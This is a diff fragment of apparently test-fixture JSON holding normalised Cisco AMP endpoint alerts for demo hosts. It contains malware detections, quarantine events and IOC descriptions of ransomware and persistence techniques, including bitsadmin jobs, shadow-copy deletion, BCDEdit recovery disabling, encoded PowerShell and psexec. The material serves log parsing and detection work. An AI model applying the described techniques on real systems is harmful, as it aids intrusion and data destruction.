"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850", + "0fe5be3811a98ee6a9c997d3812d911a", + "cf162622e29bca072d01b274fbbc3ceaacdd13c7" + ], + "related.hosts": [ + "Demo_AMP_Threat_Quarantined" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T10:05:52.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "24:78:d8:fd:c4:75" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Overdrive.RET", + "cisco.amp.detection_id": "6533241145273614337", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "24:78:d8:fd:c4:75" + ], + "cisco.amp.timestamp_nanoseconds": 525000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533241145273614000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850", + "file.name": "BIT4BBF.tmp", + "file.path": "\\\\?\\C:\\BIT4BBF.tmp", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Quarantined", + "host.name": "Demo_AMP_Threat_Quarantined", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 7800, + "process.hash.md5": "54a47f6b5e09a77e61649109c6a08866", + "process.hash.sha1": "4af001b3c3816b860660cf2de2c0fd3c1dfb4878", + "process.hash.sha256": "121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2", + "process.name": "svchost.exe", + "process.pid": 896, + "related.hash": [ + "a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850" + ], + "related.hosts": [ + "Demo_AMP_Threat_Quarantined" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T10:05:52.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "24:78:d8:fd:c4:75" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6533241145273614338", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "24:78:d8:fd:c4:75" + ], + "cisco.amp.timestamp_nanoseconds": 619000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533241145273614000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Quarantined", + "host.name": "Demo_AMP_Threat_Quarantined", + "input.type": "log", + "log.offset": 9301, + "related.hash": [ + "a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850" + ], + "related.hosts": [ + "Demo_AMP_Threat_Quarantined" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T10:05:50.000Z", + "cisco.amp.cloud_ioc.description": "The Windows Scripting Host (WScript.exe) was used to execute a file with a fake benign extension prior to a scripting extension. This is indicative of an attempt to conceal the malicious intent of the file and to trick the user into opening it.", + "cisco.amp.cloud_ioc.short_description": "W32.WScriptExecuteFakeExtension.ioc", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "24:78:d8:fd:c4:75" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296274, + "cisco.amp.file.disposition": "Clean", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "24:78:d8:fd:c4:75" + ], + "cisco.amp.timestamp_nanoseconds": 875739000, + "event.action": "Cloud IOC", + "event.category": [ + "file" + ], + "event.dataset": "cisco.amp", + "event.id": 1521138739875754000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "event.start": "2021-01-14T10:05:50.000Z", + "file.hash.sha256": "047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0", + "file.name": "WScript.exe", + "file.path": "/C:/Windows/System32/WScript.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Quarantined", + "host.name": "Demo_AMP_Threat_Quarantined", + "input.type": "log", + "log.offset": 10424, + "process.hash.sha256": "0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894", + "related.hash": [ + "047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0" + ], + "related.hosts": [ + "Demo_AMP_Threat_Quarantined" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T10:05:50.000Z", + "cisco.amp.cloud_ioc.description": "Bitsadmin is a command-line tool that can be used to create, download or upload jobs and monitor their progress. However, it can also be used to maintain persistence and evade checks for usual persistence mechanisms. An attacker with Administrator's rights can use the setnotifycmdline option to create a persistent job and then specify a /Resume option at a later time to execute the job. This mechanism allows the malware to survive reboots since the job is run repeatedly after a system restart. Moreover, Bitsadmin by default downloads files unless the destination server is running IIS with the required server component and /UPLOAD is specified in the command-line. While this is not by itself malicious, the command-line needs to be reviewed to ascertain the origin and intent.", + "cisco.amp.cloud_ioc.short_description": "W32.Bitsadmin.ioc", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "24:78:d8:fd:c4:75" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296274, + "cisco.amp.file.disposition": "Clean", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "24:78:d8:fd:c4:75" + ], + "cisco.amp.timestamp_nanoseconds": 868146000, + "event.action": "Cloud IOC", + "event.category": [ + "file" + ], + "event.dataset": "cisco.amp", + "event.id": 1521138739868158500, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "event.start": "2021-01-14T10:05:50.000Z", + "file.hash.sha256": "838670c83e6d1984d0c46e39c196028d292b3a6d2df96183f2f6e408f1a16e00", + "file.name": "bitsadmin.exe", + "file.path": "/C:/Windows/System32/bitsadmin.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Quarantined", + "host.name": "Demo_AMP_Threat_Quarantined", + "input.type": "log", + "log.offset": 12096, + "process.hash.sha256": "047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0", + "related.hash": [ + "838670c83e6d1984d0c46e39c196028d292b3a6d2df96183f2f6e408f1a16e00" + ], + "related.hosts": [ + "Demo_AMP_Threat_Quarantined" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T10:05:50.000Z", + "cisco.amp.cloud_ioc.description": "Windows Script Host (wscript.exe) was used to execute a JavaScript file inside a zip archive. This attack vector is increasingly being used by ransomware. This may not be necessarily malicious but it needs further investigation to determine if the executed JavaScript is indeed malicious.", + "cisco.amp.cloud_ioc.short_description": "W32.WScriptLaunchedZippedJS.ioc", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "24:78:d8:fd:c4:75" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296274, + "cisco.amp.file.disposition": "Clean", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "24:78:d8:fd:c4:75" + ], + "cisco.amp.timestamp_nanoseconds": 846943000, + "event.action": "Cloud IOC", + "event.category": [ + "file" + ], + "event.dataset": "cisco.amp", + "event.id": 1521138739846959000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "event.start": "2021-01-14T10:05:50.000Z", + "file.hash.sha256": "047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0", + "file.name": "WScript.exe", + "file.path": "/C:/Windows/System32/WScript.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Quarantined", + "host.name": "Demo_AMP_Threat_Quarantined", + "input.type": "log", + "log.offset": 14294, + "process.hash.sha256": "0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894", + "related.hash": [ + "047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0" + ], + "related.hosts": [ + "Demo_AMP_Threat_Quarantined" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T10:04:56.000Z", + "cisco.amp.cloud_ioc.description": "Shadow copies are snapshots of part of the filesystem, used for backups and restore points. Ransomware may delete these to prevent the user from restoring files that it has encrypted or destroyed. Aside from ransomware, shadow copy deletion may also be used by other types of malware to remove forensic evidence of malicious activity.", + "cisco.amp.cloud_ioc.short_description": "W32.PossibleRansomwareShadowCopyDeletion.ioc", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296274, + "cisco.amp.file.disposition": "Clean", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 48000000, + "event.action": "Cloud IOC", + "event.category": [ + "file" + ], + "event.dataset": "cisco.amp", + "event.id": 1494576726048000300, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "event.start": "2021-01-14T10:04:56.000Z", + "file.hash.sha256": "e09bf4d27555ec7567a598ba89ccc33667252cef1fb0b604315ea7562d18ad10", + "file.name": "vssadmin.exe", + "file.path": "/C:/windows/system32/vssadmin.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 16006, + "process.hash.sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae", + "related.hash": [ + "e09bf4d27555ec7567a598ba89ccc33667252cef1fb0b604315ea7562d18ad10" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T10:04:49.000Z", + "cisco.amp.cloud_ioc.description": "The BCDEdit command displays and modifies information about the boot options for Windows Vista and later Windows operating systems. In this case, it was used to disable automatic start up of recovery mode at boot susequent to a failure. Malware, such as ransomware, may use this to prevent the user from booting Windows into a safe mode or recovering a previous setting.", + "cisco.amp.cloud_ioc.short_description": "W32.BCDEditDisableRecovery.ioc", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296274, + "cisco.amp.file.disposition": "Clean", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 672000000, + "event.action": "Cloud IOC", + "event.category": [ + "file" + ], + "event.dataset": "cisco.amp", + "event.id": 1494576727672000300, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 1, + "event.start": "2021-01-14T10:04:49.000Z", + "file.hash.sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae", + "file.name": "cmd.exe", + "file.path": "/C:/windows/system32/cmd.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 17775, + "process.hash.sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", + "related.hash": [ + "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T10:03:40.000Z", + "cisco.amp.cloud_ioc.description": "A file containing a benign extension prior to the .exe extension was executed. This is indicative of suspicious behaviour in an attempt to conceal the malicious intent of the file.", + "cisco.amp.cloud_ioc.short_description": "W32.FakeExtensionExec.RET", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "df:d1:ed:2d:c8:fc" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296274, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "df:d1:ed:2d:c8:fc" + ], + "cisco.amp.timestamp_nanoseconds": 791000000, + "event.action": "Cloud IOC", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 1458617561791000300, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "event.start": "2021-01-14T10:03:40.000Z", + "file.hash.sha256": "d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b", + "file.name": "report.pdf.exe", + "file.path": "/c:/users/rsteadman/downloads/report.pdf.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Low_Prev_Retro", + "host.name": "Demo_Low_Prev_Retro", + "input.type": "log", + "log.offset": 19558, + "process.hash.sha256": "93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8", + "related.hash": [ + "d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b" + ], + "related.hosts": [ + "Demo_Low_Prev_Retro" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T10:01:51.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "be:b0:d5:89:e2:96" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6880587034675642558", + "cisco.amp.error.description": "Object path not found", + "cisco.amp.error.error_code": 3221225530, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Unknown", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "be:b0:d5:89:e2:96" + ], + "cisco.amp.timestamp_nanoseconds": 396000000, + "event.action": "Quarantine Failure", + "event.dataset": "cisco.amp", + "event.id": 6880587034675643000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e", + "fileset.name": "amp", + "host.hostname": "Demo_BP_WMIPRVSE", + "host.name": "Demo_BP_WMIPRVSE", + "input.type": "log", + "log.offset": 21167, + "related.hash": [ + "5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e" + ], + "related.hosts": [ + "Demo_BP_WMIPRVSE" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T10:01:50.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "be:b0:d5:89:e2:96" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "Generic.Malware.WX.9E93D282", + "cisco.amp.detection_id": "6880587021790740668", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Unknown", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "be:b0:d5:89:e2:96" + ], + "cisco.amp.timestamp_nanoseconds": 737000000, + "event.action": "Threat Detected", + "event.category": [ + "file" + ], + "event.dataset": "cisco.amp", + "event.id": 6880587030380676000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "1e5d8b8b8e0d8b74643f7a68430f8dc703290190cc60dcdb4f08c9ecae342b48", + "file.name": "p3fci4nu.dll", + "file.path": "\\\\?\\C:\\Windows\\Temp\\p3fci4nu\\p3fci4nu.dll", + "fileset.name": "amp", + "host.hostname": "Demo_BP_WMIPRVSE", + "host.name": "Demo_BP_WMIPRVSE", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 27082, + "process.hash.md5": "23ee3d381cfe3b9f6229483e2ce2f9e1", + "process.hash.sha1": "93cf877f5627e55ec076a656e935042fac39950e", + "process.hash.sha256": "4240a12e0b246c9d69af1f697488fe7da1b497df20f4a6f95135b4d5fe180a57", + "process.name": "csc.exe", + "process.pid": 6708, + "related.hash": [ + "1e5d8b8b8e0d8b74643f7a68430f8dc703290190cc60dcdb4f08c9ecae342b48" + ], + "related.hosts": [ + "Demo_BP_WMIPRVSE" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T09:56:55.000Z", + "cisco.amp.cloud_ioc.description": "The psexec utility was executed as admin.", + "cisco.amp.cloud_ioc.short_description": "W32.PsexecAsAdmin.ioc", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "04:e6:4d:d5:7a:b5" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296274, + "cisco.amp.file.disposition": "Clean", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "04:e6:4d:d5:7a:b5" + ], + "cisco.amp.timestamp_nanoseconds": 615000000, + "event.action": "Cloud IOC", + "event.category": [ + "file" + ], + "event.dataset": "cisco.amp", + "event.id": 460392585524661250, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "event.start": "2021-01-14T09:56:55.000Z", + "file.hash.sha256": "3337e3875b05e0bfba69ab926532e3f179e8cfbf162ebb60ce58a0281437a7ef", + "file.name": "PsExec.exe", + "file.path": "file:///C%3A/share%24/PsExec.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_MAP_FriedEx", + "host.name": "Demo_AMP_MAP_FriedEx", + "input.type": "log", + "log.offset": 28604, + "process.hash.sha256": "db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386", + "related.hash": [ + "3337e3875b05e0bfba69ab926532e3f179e8cfbf162ebb60ce58a0281437a7ef" + ], + "related.hosts": [ + "Demo_AMP_MAP_FriedEx" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T07:56:40.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "38:1e:eb:ba:2c:15" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 553648173, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "38:1e:eb:ba:2c:15" + ], + "cisco.amp.timestamp_nanoseconds": 758406329, + "event.action": "File Fetch Completed", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6508191586038317000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 0, + "file.hash.md5": "41476df3138717868118d8542cf3d1d6", + "file.hash.sha1": "5ca4bef8de6def53519d4b22632675bb4c1e470b", + "file.hash.sha256": "6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86", + "file.name": "resume.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\Desktop\\resume.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP", + "host.name": "Demo_AMP", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 30050, + "related.hash": [ + "6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86", + "41476df3138717868118d8542cf3d1d6", + "5ca4bef8de6def53519d4b22632675bb4c1e470b" + ], + "related.hosts": [ + "Demo_AMP" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T05:49:06.000Z", + "cisco.amp.cloud_ioc.description": "PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a shell was launched with an encoded command or to use Base64 to decode or encode an existing file or command. Malware authors may use this technique to bypass antivirus tools.", + "cisco.amp.cloud_ioc.short_description": "W32.PowershellEncodedBuffer.ioc", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "04:e6:4d:d5:7a:b5" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296274, + "cisco.amp.file.disposition": "Clean", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "04:e6:4d:d5:7a:b5" + ], + "cisco.amp.timestamp_nanoseconds": 403000000, + "event.action": "Cloud IOC", + "event.category": [ + "file" + ], + "event.dataset": "cisco.amp", + "event.id": 7007136035192884000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "event.start": "2021-01-14T05:49:06.000Z", + "file.hash.sha256": "a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8", + "file.name": "powershell.exe", + "file.path": "file:///C%3A/Windows/System32/WindowsPowerShell/v1.0/powershell.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_MAP_FriedEx", + "host.name": "Demo_AMP_MAP_FriedEx", + "input.type": "log", + "log.offset": 31276, + "process.hash.sha256": "a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8", + "related.hash": [ + "a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8" + ], + "related.hosts": [ + "Demo_AMP_MAP_FriedEx" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T00:37:44.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "38:1e:eb:ba:2c:15" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296278, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "38:1e:eb:ba:2c:15" + ], + "cisco.amp.timestamp_nanoseconds": 0, + "event.action": "Threat Detected in Low Prevalence Executable", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 1515350231459808800, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86", + "file.name": "resume.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP", + "host.name": "Demo_AMP", + "input.type": "log", + "log.offset": 33023, + "related.hash": [ + "6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86" + ], + "related.hosts": [ + "Demo_AMP" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T00:27:10.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "38:1e:eb:ba:2c:15" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 553648173, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "38:1e:eb:ba:2c:15" + ], + "cisco.amp.timestamp_nanoseconds": 579890366, + "event.action": "File Fetch Completed", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6508191586038317000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 0, + "file.hash.md5": "41476df3138717868118d8542cf3d1d6", + "file.hash.sha1": "5ca4bef8de6def53519d4b22632675bb4c1e470b", + "file.hash.sha256": "6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86", + "file.name": "resume.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\Desktop\\resume.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP", + "host.name": "Demo_AMP", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 34132, + "related.hash": [ + "6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86", + "41476df3138717868118d8542cf3d1d6", + "5ca4bef8de6def53519d4b22632675bb4c1e470b" + ], + "related.hosts": [ + "Demo_AMP" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T00:02:08.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "04:e6:4d:d5:7a:b5" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 553648130, + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "04:e6:4d:d5:7a:b5" + ], + "cisco.amp.timestamp_nanoseconds": 614000000, + "event.action": "Policy Update", + "event.dataset": "cisco.amp", + "event.id": 6583671182384431000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 0, + "fileset.name": "amp", + "host.hostname": "Demo_AMP_MAP_FriedEx", + "host.name": "Demo_AMP_MAP_FriedEx", + "input.type": "log", + "log.offset": 35358, + "related.hosts": [ + "Demo_AMP_MAP_FriedEx" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-13T15:36:52.000Z", + 